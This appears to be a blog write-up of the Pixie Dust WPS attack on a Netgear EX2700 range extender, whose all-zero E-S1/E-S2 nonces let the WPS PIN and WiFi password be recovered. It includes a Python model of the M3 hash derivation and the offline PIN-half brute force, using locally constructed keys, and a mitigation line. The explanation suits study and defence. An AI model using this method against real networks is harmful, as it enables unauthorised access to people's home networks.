WPS Attack - PixieDust

I have been gifted this Netgear EX2700 consumer appliance, which is designed to act as a wireless extender for your wireless network. Its primary use is, naturally, to extend the signal range to cover any WiFi dead spots in your house. It works in a bridged mode alongside your wireless router. "A wireless range extender takes an existing signal from a wireless router or wireless access point and rebroadcasts it to create a second network. When two or more hosts have to be connected with one another over the IEEE 802.11 protocol and the distance is too long for a direct connection to be established, a wireless repeater is used to bridge the gap." (Wikipedia) This model comes with a MediaTek MT7620A chipset, was released to the market in July 2014, and was produced by MediaTek in partnership with Ralink (acquired by MediaTek in 2011).

The EX2700, still sold by Netgear under the "Essentials" product line, is essentially a backdoor into a home network if the WPS PIN is enabled and the software is not updated: a convenient entry point that intruders can exploit. Due to a vulnerability in its WiFi SoC chipset, the MediaTek MT7620A, which controls the behaviour of the device itself, an attacker can obtain the WPS PIN of the EX2700 in a matter of minutes and consequently retrieve the PSK (the WiFi password) of the network. More on this later....

"A system on a chip or system on chip (SoC or SOC) is an integrated circuit (also known as an "IC" or "chip") that integrates all components of a computer or other electronic systems. These components typically include a central processing unit (CPU), memory, input/output ports and secondary storage, all on a single substrate. It may contain digital, analog, mixed-signal, and often radio-frequency functions, depending on the application. SoCs are very common in the mobile computing market because of their low power consumption." Think Raspberry Pi!

Vulnerability!

This device, among many, many others ( https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923 ), is susceptible to a Pixie Dust attack when its WPS functionality is in use: an offline brute-forcing method that targets the secret E-S1 and E-S2 nonces used during the WPS exchange. Pixie Dust obtains the information it needs from the M3 message.

(Link to the 2014 research by Dominique Bongard.) In most cases this attack is possible due to low entropy in the algorithm responsible for generating the supposedly "random" E-S1 and E-S2 numbers that are meant to secure the whole process. In the EX2700 the situation is even less secure, as those numbers do not seem to be generated at all: they are all equal to 0. This oversight in the design of the WPS exchange process results in instant recovery of the router's PIN.
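To show why all-zero E-S1/E-S2 nonces make the M3 hashes checkable offline, here is an added Python model of the WPS hash derivation (not the page's, Netgear's or pixiewps' code). AuthKey, PKE and PKR are constructed stand-ins for the values the Diffie-Hellman exchange would normally produce, and the PIN is a made-up one.

```python
import hashlib
import hmac
import os

# Toy model of the WPS registration-protocol values named on this page.
# All keys are constructed locally for the demo: AuthKey would really be
# derived from the DH exchange and PKE/PKR are the 192-byte DH public keys.
AUTH_KEY = hashlib.sha256(b"constructed AuthKey for the demo").digest()
PKE = bytes(range(192))                     # constructed stand-in for PKE
PKR = bytes(reversed(range(192)))           # constructed stand-in for PKR
ZERO_NONCE = bytes(16)                      # what the EX2700 uses for E-S1/E-S2


def psk_half(auth_key: bytes, pin_half: str) -> bytes:
    # PSK1/PSK2 are the first 128 bits of HMAC-SHA256(AuthKey, PIN half)
    return hmac.new(auth_key, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(auth_key: bytes, nonce: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    # E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR); same shape for E-Hash2
    return hmac.new(auth_key, nonce + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3(pin: str, weak_nonces: bool) -> tuple:
    """Build the two hashes an enrollee (here, the extender) places in M3."""
    e_s1 = ZERO_NONCE if weak_nonces else os.urandom(16)
    e_s2 = ZERO_NONCE if weak_nonces else os.urandom(16)
    e_hash1 = e_hash(AUTH_KEY, e_s1, psk_half(AUTH_KEY, pin[:4]), PKE, PKR)
    e_hash2 = e_hash(AUTH_KEY, e_s2, psk_half(AUTH_KEY, pin[4:]), PKE, PKR)
    return e_hash1, e_hash2


def offline_check(e_hash_value: bytes, assumed_nonce: bytes = ZERO_NONCE):
    """Try every 4-digit PIN half against one M3 hash, assuming a nonce value.

    Returns (matching_half, hmac_evaluations). With a proper 128-bit random
    nonce the assumption is wrong, nothing matches and the hash leaks nothing;
    with an all-zero nonce the half is confirmed within 10**4 evaluations.
    """
    for count, half in enumerate((f"{i:04d}" for i in range(10_000)), start=1):
        candidate = e_hash(AUTH_KEY, assumed_nonce, psk_half(AUTH_KEY, half), PKE, PKR)
        if hmac.compare_digest(candidate, e_hash_value):
            return half, count
    return None, 10_000


def demo(pin: str = "12345670") -> dict:
    weak1, weak2 = enrollee_m3(pin, weak_nonces=True)
    sound1, _ = enrollee_m3(pin, weak_nonces=False)
    return {
        "weak_first_half": offline_check(weak1),    # ("1234", 1235)
        "weak_second_half": offline_check(weak2),   # ("5670", 5671)
        "sound_first_half": offline_check(sound1),  # (None, 10000)
    }
```

The mitigation is the same one the protocol always assumed: the enrollee must draw E-S1 and E-S2 from a cryptographically strong random source, or disable WPS entirely.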

PixieWPS cracking the PIN in less than a minute.